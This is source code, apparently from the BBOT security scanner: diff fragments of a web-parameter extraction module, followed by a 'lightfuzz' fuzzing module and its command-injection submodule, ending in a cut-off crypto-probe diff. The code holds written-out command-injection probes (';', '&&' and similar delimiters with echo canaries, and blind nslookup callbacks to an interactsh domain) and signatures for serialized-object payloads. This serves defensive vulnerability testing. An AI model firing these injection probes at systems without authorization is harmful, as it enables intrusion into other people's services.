"JQuery Extractor" + 
discovery_regex = r"/\$\.ajax\(\{[^\<$\$]*\}\)/s nocase" + extraction_regex = None + output_type = "BODYJSON" + ajax_content_regexes = { + "url": r"url\s*:\s*['\"](.*?)['\"]", + "type": r"type\s*:\s*['\"](.*?)['\"]", + "content_type": r"contentType\s*:\s*['\"](.*?)['\"]", + "data": r"data:.*(\{[^}]*\})", + } + + def extract(self): + # Iterate through each regex in ajax_content_regexes + extracted_values = {} + for key, pattern in self.ajax_content_regexes.items(): + match = re.search(pattern, self.result) + if match: + # Store the matched value in the dictionary + extracted_values[key] = match.group(1) + + # check to see if the format is defined as JSON + if "content_type" in extracted_values.keys(): + if extracted_values["content_type"] == "application/json": + # If we cant figure out the parameter names, there is no point in continuing + if "data" in extracted_values.keys(): + if "url" in extracted_values.keys(): + form_url = extracted_values["url"] + else: + form_url = None + + form_parameters = {} + try: + s = extracted_values["data"] + s = re.sub(r"(\w+)\s*:", r'"\1":', s) # Quote keys + s = re.sub(r":\s*(\w+)", r': "\1"', s) # Quote values if they are unquoted + data = json.loads(s) + except (ValueError, SyntaxError): + return None + for p in data.keys(): + form_parameters[p] = None + + for parameter_name in form_parameters: + yield ( + "BODYJSON", + parameter_name, + None, + form_url, + _exclude_key(form_parameters, parameter_name), + ) + class GetForm(ParameterExtractorRule): name = "GET Form" discovery_regex = r'/]*\bmethod=["\']?get["\']?[^>]*>.*<\/form>/s nocase' - form_content_regexes = [ - bbot_regexes.input_tag_regex, - bbot_regexes.select_tag_regex, - bbot_regexes.textarea_tag_regex, - ] + form_content_regexes = { + "input_tag_regex": bbot_regexes.input_tag_regex, + "input_tag_regex2": bbot_regexes.input_tag_regex2, + "select_tag_regex": bbot_regexes.select_tag_regex, + "textarea_tag_regex": bbot_regexes.textarea_tag_regex, + "button_tag_regex": 
bbot_regexes.button_tag_regex, + "button_tag_regex2": bbot_regexes.button_tag_regex2, + "_input_tag_novalue_regex": bbot_regexes.input_tag_novalue_regex, + } extraction_regex = bbot_regexes.get_form_regex output_type = "GETPARAM" def extract(self): forms = self.extraction_regex.findall(str(self.result)) for form_action, form_content in forms: + if not form_action or form_action == "#": + form_action = None + + elif form_action.startswith("./"): + form_action = form_action.lstrip(".") + form_parameters = {} - for form_content_regex in self.form_content_regexes: + for form_content_regex_name, form_content_regex in self.form_content_regexes.items(): input_tags = form_content_regex.findall(form_content) + if input_tags: + if form_content_regex_name == "_input_tag_novalue_regex": + form_parameters.setdefault(input_tags[0], None) - for parameter_name, original_value in input_tags: - form_parameters[parameter_name] = original_value + else: + if form_content_regex_name in ["input_tag_regex2", "button_tag_regex2"]: + input_tags = [(b, a) for a, b in input_tags] - for parameter_name, original_value in form_parameters.items(): - yield ( - self.output_type, - parameter_name, - original_value, - form_action, - _exclude_key(form_parameters, parameter_name), - ) + for parameter_name, original_value in input_tags: + # form_parameters[parameter_name] = original_value.strip() + form_parameters.setdefault(parameter_name, original_value.strip()) + + + for parameter_name, original_value in form_parameters.items(): + yield ( + self.output_type, + parameter_name, + original_value, + form_action, + _exclude_key(form_parameters, parameter_name), + ) + + class GetForm2(GetForm): + extraction_regex = bbot_regexes.get_form_regex2 class PostForm(GetForm): name = "POST Form" @@ -461,6 +545,21 @@ class PostForm(GetForm): extraction_regex = bbot_regexes.post_form_regex output_type = "POSTPARAM" + class PostForm2(PostForm): + extraction_regex = bbot_regexes.post_form_regex2 + + class 
PostForm_NoAction(PostForm): + name = "POST Form (no action)" + extraction_regex = bbot_regexes.post_form_regex_noaction + + # underscore ensure generic forms runs last, so it doesn't cause dedupe to stop full form detection + class _GenericForm(GetForm): + name = "Generic Form" + discovery_regex = r"/]*>.*<\/form>/s nocase" + + extraction_regex = bbot_regexes.generic_form_regex + output_type = "GETPARAM" + def __init__(self, excavate): super().__init__(excavate) self.parameterExtractorCallbackDict = {} @@ -472,12 +571,12 @@ def __init__(self, excavate): regexes_component_list.append(f"${r.__name__} = {r.discovery_regex}") regexes_component = " ".join(regexes_component_list) self.yara_rules["parameter_extraction"] = ( - rf'rule parameter_extraction {{meta: description = "contains POST form" strings: {regexes_component} condition: any of them}}' + rf'rule parameter_extraction {{meta: description = "contains Parameter" strings: {regexes_component} condition: any of them}}' ) async def process(self, yara_results, event, yara_rule_settings, discovery_context): for identifier, results in yara_results.items(): - for result in results: + for result in results: if identifier not in self.parameterExtractorCallbackDict.keys(): raise ExcavateError("ParameterExtractor YaraRule identified reference non-existent submodule") parameterExtractorSubModule = self.parameterExtractorCallbackDict[identifier]( @@ -495,12 +594,20 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte self.excavate.debug( f"Found Parameter [{parameter_name}] in [{parameterExtractorSubModule.name}] ParameterExtractor Submodule" ) - endpoint = event.data["url"] if not endpoint else endpoint - url = ( - endpoint - if endpoint.startswith(("http://", "https://")) - else f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{endpoint}" - ) + # If we have a full URL, leave it as-is + + if endpoint and endpoint.startswith(("http://", "https://")): + url = endpoint + + # The endpoint 
is usually a form action - we should use it if we have it. If not, default to URL. + else: + # Use the original URL as the base and resolve the endpoint correctly in case of relative paths + base_url = ( + f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{event.parsed_url.path}" + ) + if self.excavate.retain_querystring and len(event.parsed_url.query) > 0: + base_url += f"?{event.parsed_url.query}" + url = urljoin(base_url, endpoint) if self.excavate.helpers.validate_parameter(parameter_name, parameter_type): if self.excavate.in_bl(parameter_name) is False: @@ -598,12 +705,13 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte class SerializationExtractor(ExcavateRule): regexes = { - "Java": re.compile(r"[^a-zA-Z0-9\/+]rO0[a-zA-Z0-9+\/]+={0,2}"), - "DOTNET": re.compile(r"[^a-zA-Z0-9\/+]AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), - "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+]YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_String": re.compile(r"[^a-zA-Z0-9\/+]czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+]Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+]H4sIAAAAAAAA[a-zA-Z0-9+\/]+={0,2}"), + "Java": re.compile(r"[^a-zA-Z0-9\/+][\"']?rO0[a-zA-Z0-9+\/]+={0,2}"), + "Ruby": re.compile(r"[^[^a-zA-Z0-9\/+][\"']?BAh[a-zA-Z0-9+\/]+={0,2}"), + "DOTNET": re.compile(r"[^a-zA-Z0-9\/+][\"']?AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), + "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+][\"']?YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_String": re.compile(r"[^a-zA-Z0-9\/+][\"']?czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+][\"']?Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+][\"']?H4sIAAAA[a-zA-Z0-9+\/]+={0,2}"), } yara_rules = {} @@ -701,7 +809,7 @@ class URLExtractor(ExcavateRule): tags = "spider-danger" description = "contains tag with src or href attribute" strings: - $url_attr = 
/<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ + $url_attr = /<[^>]+(href|src|action)=["\']?[^"\']*["\']?[^>]*>/ condition: $url_attr } @@ -899,9 +1007,10 @@ async def setup(self): return True async def search(self, data, event, content_type, discovery_context="HTTP response"): + # TODO: replace this JSON/XML extraction with our lightfuzz envelope stuff + if not data: return None - decoded_data = await self.helpers.re.recursive_decode(data) if self.parameter_extraction: @@ -933,12 +1042,30 @@ async def search(self, data, event, content_type, discovery_context="HTTP respon await self.emit_event(data, "WEB_PARAMETER", event, context=context) return - for result in self.yara_rules.match(data=f"{data}\n{decoded_data}"): - rule_name = result.rule - if rule_name in self.yara_preprocess_dict: - await self.yara_preprocess_dict[rule_name](result, event, discovery_context) - else: - self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules") + # Initialize the list of data items to process + data_items = [] + + # Check if data and decoded_data are identical + if data == decoded_data: + data_items.append(("data", data)) # Add only one since both are the same + else: + data_items.append(("data", data)) + data_items.append(("decoded_data", decoded_data)) + + for label, data_instance in data_items: + # Your existing processing code + for result in self.yara_rules.match(data=f"{data_instance}"): + rule_name = result.rule + + # Skip specific operations for 'parameter_extraction' rule on decoded_data + if label == "decoded_data" and rule_name == "parameter_extraction": + continue + + # Check if rule processing function exists + if rule_name in self.yara_preprocess_dict: + await self.yara_preprocess_dict[rule_name](result, event, discovery_context) + else: + self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules") async def handle_event(self, event): if event.type == "HTTP_RESPONSE": @@ -971,6 +1098,42 @@ async def handle_event(self, event): context = 
f"Excavate parsed a URL directly from the scan target for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it" await self.emit_event(data, "WEB_PARAMETER", event, context=context) + # If parameter_extraction is enabled and we assigned custom headers, emit them as WEB_PARAMETER + if self.parameter_extraction is True: + custom_cookies = self.scan.web_config.get("http_cookies", {}) + for custom_cookie_name, custom_cookie_value in custom_cookies.items(): + description = f"HTTP Extracted Parameter [{custom_cookie_name}] (Custom Cookie)" + data = { + "host": event.parsed_url.hostname, + "type": "COOKIE", + "name": custom_cookie_name, + "original_value": custom_cookie_value, + "url": self.url_unparse("COOKIE", event.parsed_url), + "description": description, + "additional_params": _exclude_key(custom_cookies, custom_cookie_name), + } + context = ( + f"Excavate saw a custom cookie set [{custom_cookie_name}], and emitted a WEB_PARAMETER for it" + ) + await self.emit_event(data, "WEB_PARAMETER", event, context=context) + + custom_headers = self.scan.web_config.get("http_headers", {}) + for custom_header_name, custom_header_value in custom_headers.items(): + description = f"HTTP Extracted Parameter [{custom_header_name}] (Custom Header)" + data = { + "host": event.parsed_url.hostname, + "type": "HEADER", + "name": custom_header_name, + "original_value": custom_header_value, + "url": self.url_unparse("HEADER", event.parsed_url), + "description": description, + "additional_params": _exclude_key(custom_headers, custom_header_name), + } + context = ( + f"Excavate saw a custom header set [{custom_header_name}], and emitted a WEB_PARAMETER for it" + ) + await self.emit_event(data, "WEB_PARAMETER", event, context=context) + data = event.data # process response data @@ -990,10 +1153,10 @@ async def handle_event(self, event): self.debug(f"Cookie found without '=': {header_value}") continue else: - cookie_name = 
from bbot.modules.base import BaseModule

from urllib.parse import urlunparse
from bbot.errors import InteractshError

from .lightfuzz_submodules.cmdi import CmdILightfuzz
from .lightfuzz_submodules.crypto import CryptoLightfuzz
from .lightfuzz_submodules.path import PathTraversalLightfuzz
from .lightfuzz_submodules.sqli import SQLiLightfuzz
from .lightfuzz_submodules.ssti import SSTILightfuzz
from .lightfuzz_submodules.xss import XSSLightfuzz
from .lightfuzz_submodules.serial import SerialLightfuzz


class lightfuzz(BaseModule):
    """Find WEB_PARAMETER events and lightly fuzz them with heuristic submodules."""

    watched_events = ["URL", "WEB_PARAMETER"]
    produced_events = ["FINDING", "VULNERABILITY"]
    flags = ["active", "aggressive", "web-thorough"]

    # Registry of available fuzzing submodules, keyed by their config name
    submodules = {
        "sqli": {"description": "SQL Injection", "module": SQLiLightfuzz},
        "cmdi": {"description": "Command Injection", "module": CmdILightfuzz},
        "xss": {"description": "Cross-site Scripting", "module": XSSLightfuzz},
        "path": {"description": "Path Traversal", "module": PathTraversalLightfuzz},
        "ssti": {"description": "Server-side Template Injection", "module": SSTILightfuzz},
        "crypto": {"description": "Cryptography Probe", "module": CryptoLightfuzz},
        "serial": {"description": "Unsafe Deserialization Probe", "module": SerialLightfuzz},
    }

    options = {"force_common_headers": False, "enabled_submodules": [], "disable_post": False}
    options_desc = {
        "force_common_headers": "Force emit commonly exploitable parameters that may be difficult to detect",
        "enabled_submodules": "A list of submodules to enable. An empty list enables all submodules.",
        "disable_post": "Disable processing of POST parameters, avoiding form submissions.",
    }

    meta = {
        "description": "Find Web Parameters and Lightly Fuzz them using a heuristic based scanner",
        "author": "@liquidsec",
        "created_date": "2024-06-28",
    }
    common_headers = ["x-forwarded-for", "user-agent"]
    in_scope_only = True

    _module_threads = 4

    async def setup(self):
        """Validate config, enable the requested submodules, and register interactsh if needed."""
        self.event_dict = {}
        self.interactsh_subdomain_tags = {}
        self.interactsh_instance = None
        self.disable_post = self.config.get("disable_post", False)
        self.enabled_submodules = self.config.get("enabled_submodules")

        for m in self.enabled_submodules:
            if m not in self.submodules:
                # Bug fix: the option is named "enabled_submodules", not "enabled_modules"
                self.hugewarning(f"Invalid Lightfuzz submodule ({m}) specified in enabled_submodules")
                return False

        for submodule, submodule_dict in self.submodules.items():
            if submodule in self.enabled_submodules or self.enabled_submodules == []:
                setattr(self, submodule, True)
                self.hugeinfo(f"Lightfuzz {submodule_dict['description']} Submodule Enabled")

                # Blind cmdi detection needs an out-of-band (interactsh) server
                if submodule == "cmdi" and self.scan.config.get("interactsh_disable", False) is False:
                    try:
                        self.interactsh_instance = self.helpers.interactsh()
                        self.interactsh_domain = await self.interactsh_instance.register(
                            callback=self.interactsh_callback
                        )
                    except InteractshError as e:
                        self.warning(f"Interactsh failure: {e}")
            else:
                setattr(self, submodule, False)
        return True

    async def interactsh_callback(self, r):
        """Emit a CRITICAL VULNERABILITY when an out-of-band interaction matches a probe tag."""
        full_id = r.get("full-id", None)
        if full_id:
            if "." in full_id:
                details = self.interactsh_subdomain_tags.get(full_id.split(".")[0])
                # Bug fix: .get() returns None for unknown tags (e.g. stale or unrelated
                # interactions), which previously raised TypeError on details["event"]
                if details is None or not details["event"]:
                    return
                await self.emit_event(
                    {
                        "severity": "CRITICAL",
                        "host": str(details["event"].host),
                        "url": details["event"].data["url"],
                        "description": f"OS Command Injection (OOB Interaction) Type: [{details['type']}] Parameter Name: [{details['name']}] Probe: [{details['probe']}]",
                    },
                    "VULNERABILITY",
                    details["event"],
                )
            else:
                # this is likely caused by something trying to resolve the base domain first and can be ignored
                self.debug("skipping result because subdomain tag was missing")

    def _outgoing_dedup_hash(self, event):
        """Deduplicate outgoing findings on host/url/description/type/name."""
        return hash(
            (
                "lightfuzz",
                str(event.host),
                event.data["url"],
                event.data["description"],
                event.data.get("type", ""),
                event.data.get("name", ""),
            )
        )

    def url_unparse(self, param_type, parsed_url):
        """Rebuild a URL from its parts, dropping the querystring for GETPARAMs.

        NOTE(review): relies on self.retain_querystring being defined elsewhere
        (it is not set in setup()) — confirm it is provided by module config.
        """
        if param_type == "GETPARAM":
            querystring = ""
        else:
            querystring = parsed_url.query
        return urlunparse(
            (
                parsed_url.scheme,
                parsed_url.netloc,
                parsed_url.path,
                "",
                querystring if self.retain_querystring else "",
                "",
            )
        )

    async def run_submodule(self, submodule, event):
        """Instantiate one fuzzing submodule against `event` and emit its results."""
        submodule_instance = submodule(self, event)
        await submodule_instance.fuzz()
        if len(submodule_instance.results) > 0:
            for r in submodule_instance.results:
                event_data = {"host": str(event.host), "url": event.data["url"], "description": r["description"]}

                envelopes = getattr(event, "envelopes", None)
                envelope_summary = getattr(envelopes, "summary", None)
                if envelope_summary:
                    # Append the envelope summary to the description
                    event_data["description"] += f" Envelopes: [{envelope_summary}]"

                if r["type"] == "VULNERABILITY":
                    event_data["severity"] = r["severity"]
                await self.emit_event(
                    event_data,
                    r["type"],
                    event,
                )

    async def handle_event(self, event):
        """For URLs, optionally force-emit common headers; for WEB_PARAMETERs, run submodules."""
        if event.type == "URL":
            # Speculative headers are only emitted when explicitly enabled
            if self.config.get("force_common_headers", False) is False:
                return False

            for h in self.common_headers:
                description = f"Speculative (Forced) Header [{h}]"
                data = {
                    "host": str(event.host),
                    "type": "HEADER",
                    "name": h,
                    "original_value": None,
                    "url": event.data,
                    "description": description,
                }
                await self.emit_event(data, "WEB_PARAMETER", event)

        elif event.type == "WEB_PARAMETER":
            # check connectivity to url before spending probes on it
            connectivity_test = await self.helpers.request(event.data["url"], timeout=10)

            if connectivity_test:
                for submodule, submodule_dict in self.submodules.items():
                    if getattr(self, submodule):
                        self.debug(f"Starting {submodule_dict['description']} fuzz()")
                        await self.run_submodule(submodule_dict["module"], event)
            else:
                self.debug(f'WEB_PARAMETER URL {event.data["url"]} failed connectivity test, aborting')

    async def cleanup(self):
        """Deregister the interactsh session, if one was created."""
        if self.interactsh_instance:
            try:
                await self.interactsh_instance.deregister()
                self.debug(
                    f"successfully deregistered interactsh session with correlation_id {self.interactsh_instance.correlation_id}"
                )
            except InteractshError as e:
                self.warning(f"Interactsh failure: {e}")

    async def finish(self):
        """Give late out-of-band interactions a final chance to arrive, then poll them."""
        if self.interactsh_instance:
            await self.helpers.sleep(5)
            try:
                for r in await self.interactsh_instance.poll():
                    await self.interactsh_callback(r)
            except InteractshError as e:
                self.debug(f"Error in interact.sh: {e}")

    async def filter_event(self, event):
        """Drop POSTPARAM events when POST processing is disabled."""
        if event.type == "WEB_PARAMETER" and self.disable_post and event.data["type"] == "POSTPARAM":
            return False, "POST parameter disabled in lightfuzz module"
        return True
import copy


class BaseLightfuzz:
    """Common plumbing shared by all lightfuzz submodules.

    Wraps probe construction and submission for every supported parameter
    type (GETPARAM, POSTPARAM, COOKIE, HEADER, BODYJSON) and handles
    envelope packing/unpacking of probe values.
    """

    def __init__(self, lightfuzz, event):
        self.lightfuzz = lightfuzz  # parent lightfuzz module (helpers, config, debug)
        self.event = event  # the WEB_PARAMETER event being fuzzed
        self.results = []

    def additional_params_process(self, additional_params, additional_params_populate_blank_empty):
        """Return additional_params, optionally replacing blank/None values with random numeric strings."""
        if additional_params_populate_blank_empty is False:
            return additional_params
        new_additional_params = {}
        for k, v in additional_params.items():
            if v == "" or v is None:
                new_additional_params[k] = self.lightfuzz.helpers.rand_string(10, numeric_only=True)
            else:
                new_additional_params[k] = v
        return new_additional_params

    def compare_baseline(
        self, event_type, probe, cookies, additional_params_populate_empty=False, speculative_mode="GETPARAM"
    ):
        """Build an http_compare baseline for the given parameter type using `probe` as the value."""
        probe = self.outgoing_probe_value(probe)
        http_compare = None

        # SPECULATIVE parameters are fuzzed as whatever concrete mode the caller chooses
        if event_type == "SPECULATIVE":
            event_type = speculative_mode

        if event_type == "GETPARAM":
            baseline_url = f"{self.event.data['url']}?{self.event.data['name']}={probe}"
            if "additional_params" in self.event.data.keys() and self.event.data["additional_params"] is not None:
                baseline_url = self.lightfuzz.helpers.add_get_params(
                    baseline_url, self.event.data["additional_params"], encode=False
                ).geturl()
            http_compare = self.lightfuzz.helpers.http_compare(
                baseline_url, cookies=cookies, include_cache_buster=False
            )
        elif event_type == "COOKIE":
            cookies_probe = {self.event.data["name"]: f"{probe}"}
            http_compare = self.lightfuzz.helpers.http_compare(
                self.event.data["url"], include_cache_buster=False, cookies={**cookies, **cookies_probe}
            )
        elif event_type == "HEADER":
            headers = {self.event.data["name"]: f"{probe}"}
            http_compare = self.lightfuzz.helpers.http_compare(
                self.event.data["url"], include_cache_buster=False, headers=headers, cookies=cookies
            )
        elif event_type == "POSTPARAM":
            data = {self.event.data["name"]: f"{probe}"}
            if self.event.data["additional_params"] is not None:
                data.update(
                    self.additional_params_process(
                        self.event.data["additional_params"], additional_params_populate_empty
                    )
                )
            http_compare = self.lightfuzz.helpers.http_compare(
                self.event.data["url"], method="POST", include_cache_buster=False, data=data, cookies=cookies
            )
        elif event_type == "BODYJSON":
            data = {self.event.data["name"]: f"{probe}"}
            if self.event.data["additional_params"] is not None:
                data.update(
                    self.additional_params_process(
                        self.event.data["additional_params"], additional_params_populate_empty
                    )
                )
            http_compare = self.lightfuzz.helpers.http_compare(
                self.event.data["url"], method="POST", include_cache_buster=False, json=data, cookies=cookies
            )
        return http_compare

    async def baseline_probe(self, cookies):
        """Send a plain request to the target URL to establish a baseline response."""
        # Bug fix: the parameter type is stored under "type" (the key used everywhere
        # else in this class), not "eventtype" — previously POSTPARAM/BODYJSON
        # baselines were always sent as GET
        if self.event.data.get("type") in ["POSTPARAM", "BODYJSON"]:
            method = "POST"
        else:
            method = "GET"

        return await self.lightfuzz.helpers.request(
            method=method,
            cookies=cookies,
            url=self.event.data.get("url"),
            allow_redirects=False,
            retries=1,
            timeout=10,
        )

    async def compare_probe(
        self,
        http_compare,
        event_type,
        probe,
        cookies,
        additional_params_populate_empty=False,
        additional_params_override=None,
        speculative_mode="GETPARAM",
    ):
        """Send `probe` and compare the response against a previously-built baseline."""
        probe = self.outgoing_probe_value(probe)
        additional_params = copy.deepcopy(self.event.data.get("additional_params", {}))
        # Bug fix: avoid a shared mutable default argument; None means "no overrides"
        if additional_params_override:
            for k, v in additional_params_override.items():
                additional_params[k] = v

        if event_type == "SPECULATIVE":
            event_type = speculative_mode

        if event_type == "GETPARAM":
            probe_url = f"{self.event.data['url']}?{self.event.data['name']}={probe}"
            if additional_params:
                probe_url = self.lightfuzz.helpers.add_get_params(probe_url, additional_params, encode=False).geturl()
            compare_result = await http_compare.compare(probe_url, cookies=cookies)
        elif event_type == "COOKIE":
            cookies_probe = {self.event.data["name"]: probe}
            compare_result = await http_compare.compare(self.event.data["url"], cookies={**cookies, **cookies_probe})
        elif event_type == "HEADER":
            headers = {self.event.data["name"]: f"{probe}"}
            compare_result = await http_compare.compare(self.event.data["url"], headers=headers, cookies=cookies)
        elif event_type == "POSTPARAM":
            data = {self.event.data["name"]: f"{probe}"}
            if additional_params:
                data.update(self.additional_params_process(additional_params, additional_params_populate_empty))
            compare_result = await http_compare.compare(
                self.event.data["url"], method="POST", data=data, cookies=cookies
            )
        elif event_type == "BODYJSON":
            data = {self.event.data["name"]: f"{probe}"}
            if additional_params:
                data.update(self.additional_params_process(additional_params, additional_params_populate_empty))
            compare_result = await http_compare.compare(
                self.event.data["url"], method="POST", json=data, cookies=cookies
            )
        return compare_result

    async def standard_probe(
        self,
        event_type,
        cookies,
        probe,
        timeout=10,
        additional_params_populate_empty=False,
        speculative_mode="GETPARAM",
        allow_redirects=False,
    ):
        """Send a single probe request (no baseline comparison) and return the response."""
        probe = self.outgoing_probe_value(probe)

        if event_type == "SPECULATIVE":
            event_type = speculative_mode

        method = "GET"
        if event_type == "GETPARAM":
            url = f"{self.event.data['url']}?{self.event.data['name']}={probe}"
            if "additional_params" in self.event.data.keys() and self.event.data["additional_params"] is not None:
                url = self.lightfuzz.helpers.add_get_params(
                    url, self.event.data["additional_params"], encode=False
                ).geturl()
        else:
            url = self.event.data["url"]
        if event_type == "COOKIE":
            cookies_probe = {self.event.data["name"]: probe}
            cookies = {**cookies, **cookies_probe}
        if event_type == "HEADER":
            headers = {self.event.data["name"]: probe}
        else:
            headers = {}

        data = None
        json_data = None

        if event_type == "POSTPARAM":
            method = "POST"
            data = {self.event.data["name"]: probe}
            if self.event.data["additional_params"] is not None:
                data.update(
                    self.additional_params_process(
                        self.event.data["additional_params"], additional_params_populate_empty
                    )
                )
        elif event_type == "BODYJSON":
            method = "POST"
            json_data = {self.event.data["name"]: probe}
            if self.event.data["additional_params"] is not None:
                json_data.update(
                    self.additional_params_process(
                        self.event.data["additional_params"], additional_params_populate_empty
                    )
                )

        self.lightfuzz.debug(f"standard_probe requested URL: [{url}]")
        return await self.lightfuzz.helpers.request(
            method=method,
            cookies=cookies,
            headers=headers,
            data=data,
            json=json_data,
            url=url,
            allow_redirects=allow_redirects,
            retries=0,
            timeout=timeout,
        )

    def metadata(self):
        """Build the standard 'Parameter/Type/Original Value' description fragment for findings."""
        metadata_string = f"Parameter: [{self.event.data['name']}] Parameter Type: [{self.event.data['type']}]"
        if self.event.data["original_value"] != "" and self.event.data["original_value"] is not None:
            metadata_string += (
                f" Original Value: [{self.lightfuzz.helpers.truncate_string(self.event.data['original_value'],200)}]"
            )
        return metadata_string

    def incoming_probe_value(self, populate_empty=True):
        """Unpack the parameter's current value from its envelopes; optionally randomize if empty."""
        envelopes = getattr(self.event, "envelopes", None)
        probe_value = ""
        if envelopes is not None:
            probe_value = envelopes.get_subparam()
            self.lightfuzz.debug(f"incoming_probe_value (after unpacking): {probe_value} with envelopes [{envelopes}]")
        if not probe_value:
            if populate_empty is True:
                probe_value = self.lightfuzz.helpers.rand_string(10, numeric_only=True)
            else:
                probe_value = ""
        probe_value = str(probe_value)
        return probe_value

    def outgoing_probe_value(self, outgoing_probe_value):
        """Pack an outgoing probe value back into the parameter's envelopes, if any."""
        self.lightfuzz.debug(f"outgoing_probe_value (before packing): {outgoing_probe_value} / {self.event}")
        envelopes = getattr(self.event, "envelopes", None)
        if envelopes is not None:
            envelopes.set_subparam(value=outgoing_probe_value)
            outgoing_probe_value = envelopes.pack()
            self.lightfuzz.debug(f"outgoing_probe_value (after packing): {outgoing_probe_value} with envelopes [{envelopes}] / {self.event}")
        return outgoing_probe_value
from bbot.errors import HttpCompareError
from .base import BaseLightfuzz

import urllib.parse


class CmdILightfuzz(BaseLightfuzz):
    """Detect OS command injection via echoed-canary probes and blind (interactsh) probes."""

    async def fuzz(self):
        cookies = self.event.data.get("assigned_cookies", {})
        probe_value = self.incoming_probe_value()

        canary = self.lightfuzz.helpers.rand_string(10, numeric_only=True)
        http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies)

        # "AAAA" is a benign control probe used to detect false positives
        cmdi_probe_strings = [
            "AAAA",
            ";",
            "&&",
            "||",
            "&",
            "|",
        ]

        positive_detections = []
        for p in cmdi_probe_strings:
            try:
                echo_probe = f"{probe_value}{p} echo {canary} {p}"
                if self.event.data["type"] == "GETPARAM":
                    echo_probe = urllib.parse.quote(echo_probe.encode(), safe="")
                cmdi_probe = await self.compare_probe(http_compare, self.event.data["type"], echo_probe, cookies)
                if cmdi_probe[3]:
                    # the canary must be reflected WITHOUT the literal "echo" command itself
                    if canary in cmdi_probe[3].text and "echo" not in cmdi_probe[3].text:
                        self.lightfuzz.debug(f"canary [{canary}] found in response when sending probe [{p}]")
                        if p == "AAAA":
                            # the harmless control probe "succeeded" - detections can't be trusted
                            # (typo fix: "Postive" -> "Positive")
                            self.lightfuzz.warning(
                                f"False Positive Probe appears to have been triggered for {self.event.data['url']}, aborting remaining detection"
                            )
                            return
                        positive_detections.append(p)
            except HttpCompareError as e:
                self.lightfuzz.debug(e)
                continue
        if len(positive_detections) > 0:
            # typo fix: "Delimeters" -> "Delimiters"
            self.results.append(
                {
                    "type": "FINDING",
                    "description": f"POSSIBLE OS Command Injection. {self.metadata()} Detection Method: [echo canary] CMD Probe Delimiters: [{' '.join(positive_detections)}]",
                }
            )

        # Blind OS Command Injection

        if self.lightfuzz.interactsh_instance:
            self.lightfuzz.event_dict[self.event.data["url"]] = self.event
            for p in cmdi_probe_strings:
                subdomain_tag = self.lightfuzz.helpers.rand_string(4, digits=False)
                # remember the tag so interactsh_callback can attribute the OOB interaction
                self.lightfuzz.interactsh_subdomain_tags[subdomain_tag] = {
                    "event": self.event,
                    "type": self.event.data["type"],
                    "name": self.event.data["name"],
                    "probe": p,
                }
                interactsh_probe = f"{p} nslookup {subdomain_tag}.{self.lightfuzz.interactsh_domain} {p}"

                if self.event.data["type"] == "GETPARAM":
                    interactsh_probe = urllib.parse.quote(interactsh_probe.encode(), safe="")
                await self.standard_probe(
                    self.event.data["type"], cookies, f"{probe_value}{interactsh_probe}", timeout=15
                )
original signer", + "signature description could not be created", + "crypto operation failed", + "OpenSSL Error", + ] + + @staticmethod + def format_agnostic_decode(input_string, urldecode=False): + encoding = "unknown" + if urldecode: + input_string = unquote(input_string) + if CryptoLightfuzz.is_hex(input_string): + data = bytes.fromhex(input_string) + encoding = "hex" + elif CryptoLightfuzz.is_base64(input_string): + data = base64.b64decode(input_string) + encoding = "base64" + else: + data = str + return data, encoding + + @staticmethod + def format_agnostic_encode(data, encoding, urlencode=False): + if encoding == "hex": + encoded_data = data.hex() + elif encoding == "base64": + encoded_data = base64.b64encode(data).decode("utf-8") # base64 encoding returns bytes, decode to string + else: + raise ValueError("Unsupported encoding type specified") + if urlencode: + return quote(encoded_data) + return encoded_data + + @staticmethod + def modify_string(input_string, action="truncate", position=None, extension_length=1): + if not isinstance(input_string, str): + input_string = str(input_string) + + data, encoding = CryptoLightfuzz.format_agnostic_decode(input_string) + if encoding != "base64" and encoding != "hex": + raise ValueError("Input must be either hex or base64 encoded") + + if action == "truncate": + modified_data = data[:-1] # Remove the last byte + elif action == "mutate": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] = (byte_list[position] + 1) % 256 + modified_data = bytes(byte_list) + elif action == "extend": + modified_data = data + (b"\x00" * extension_length) + elif action == "flip": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] ^= 0xFF # Flip all bits in the byte at the specified 
